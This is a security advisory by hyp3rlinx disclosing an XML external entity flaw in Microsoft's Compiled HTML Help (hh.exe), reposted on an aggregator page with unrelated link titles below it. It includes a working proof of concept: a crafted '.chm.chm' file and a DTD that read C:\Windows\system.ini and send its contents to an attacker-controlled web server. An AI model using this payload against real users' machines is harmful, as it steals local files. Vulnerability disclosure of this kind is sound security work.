[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft
Compiled HTML Help is a Microsoft proprietary online help format,
consisting of a collection of HTML pages, an index and other navigation
tools.
The files are compressed and deployed in a binary format with
the extension .CHM, for Compiled HTML. The format is often used for
software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.

[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
CHM
Files are usually created using Microsofts "HTML Help Workshop"
program. However, I find a way to bypass using this program and create
them easily by
simply adding double .chm extension to the file
".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it
processing any JS/HTML/XML inside etc.
Compiled HTML Help is also
vulnerable to XML External Entity attacks allowing remote attackers to
steal and exfiltrate local system files.

Whats interesting about
this one is we can create the file without using the "Microsoft HTML
Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While
CHM is already considered a "dangerous" file type and other type of
attacks have already been documented. I thought this was an interesting
way to
create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.

[Exploit/POC]
1) python -m SimpleHTTPServer

2) "XXE.chm.chm"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>

3) "payload.dtd"  (hosted in python web-server dir port 8000 above)

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;

Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.

Tested successfully Windows 7/10

[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure

[+] Disclaimer
The
information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission
is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and
that due credit is
given. Permission is explicitly given for insertion in vulnerability
databases and similar, provided that due credit
is given to the
author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility
for any damage caused
by the use or misuse of this information. The author prohibits any
malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity的更多相关文章

  1. Microsoft Internet Explorer v11 XML External Entity Injection 0day

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3 ...

  2. XML External Entity Injection(XXE)

    写在前面 安全测试fortify扫描接口项目代码,暴露出标题XXE的问题, 记录一下.官网链接: https://www.owasp.org/index.php/XML_External_Entity ...

  3. XXE(XML External Entity attack)XML外部实体注入攻击

    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...

  4. XML External Entity attack/XXE攻击

    XML External Entity attack/XXE攻击   1.相关背景介绍 可扩展标记语言(eXtensible Markup Language,XML)是一种标记语言,被设计用来传输和存 ...

  5. 【译】Attacking XML with XML External Entity Injection (XXE)

    原文链接:Attacking XML with XML External Entity Injection (XXE) XXE:使用XML外部实体注入攻击XML 在XML中,有一种注入外部文件的方式. ...

  6. XML External Entity attack

    解析外部xml给本地带来的安全隐患. https://en.wikipedia.org/wiki/XML_external_entity_attack An XML External Entity ( ...

  7. 4.XXE (XML External Entity Injection)

    XXE (XML External Entity Injection) 0x01 什么是XXE XML外部实体注入 若是PHP,libxml_disable_entity_loader设置为TRUE可 ...

  8. Fortify漏洞之XML External Entity Injection(XML实体注入)

    继续对Fortify的漏洞进行总结,本篇主要针对  XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External ...

  9. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

随机推荐

  1. Python推荐一整套开发工具

    原文:https://sourcery.ai/blog/python-best-practices/ 在开始一个新的Python项目时,很容易不做规划直接进入编码环节.花费少量时间,用最好的工具设置项 ...

  2. Java基础 throw 抛出异常后,用try...catch捕获

        JDK :OpenJDK-11      OS :CentOS 7.6.1810      IDE :Eclipse 2019‑03 typesetting :Markdown   code ...

  3. Navicat 破解版链接

    本文为转载内容 百度网盘地址: https://pan.baidu.com/s/1nvIIOad 压缩包中有注册码和使用方法

  4. Blob/DataURL/canvas/image的相互转换

    函数都比较简单,直接看就ok了 /*-----------------------------------------------------------------------*/ // canva ...

  5. CentOS离线状态下安装Python3.7.0

    1.下载python安装包以及依赖的包 python安装包:Python-3.7.0 下载地址:www.python.org/ftp/python/3.7.0/Python-3.7.0.tar.xz ...

  6. [LeetCode] 232. Implement Queue using Stacks 用栈来实现队列

    Implement the following operations of a queue using stacks. push(x) -- Push element x to the back of ...

  7. POJ 2106 Boolean Expressions

    总时间限制: 1000ms  内存限制: 65536kB 描述 The objective of the program you are going to produce is to evaluate ...

  8. SecureCRT 使用密钥登录 Ubuntu

    记录 SecureCRT 通过 SSH 使用密钥登录 Ubuntu. 具体步骤如下: 1. 使用 SecureCRT 生成密钥对: 工具 -> 创建公钥 -> 密钥类型 RSA -> ...

  9. SpringBoot + Mybatis搭建完整的项目架构

    准备工作: Java开发环境 已安装 springboot 插件(STS)的 Eclipse MySQL服务  一. 创建 springboot 项目 1. 打开Eclipse  --> 左上角 ...

  10. pycharm爬取网页数据

    1 python环境的配置 1.1 安装python文件包,放到可以找到的位置 1.2 右键计算机->属性->高级环境设置->系统变量->Path->编辑->复制p ...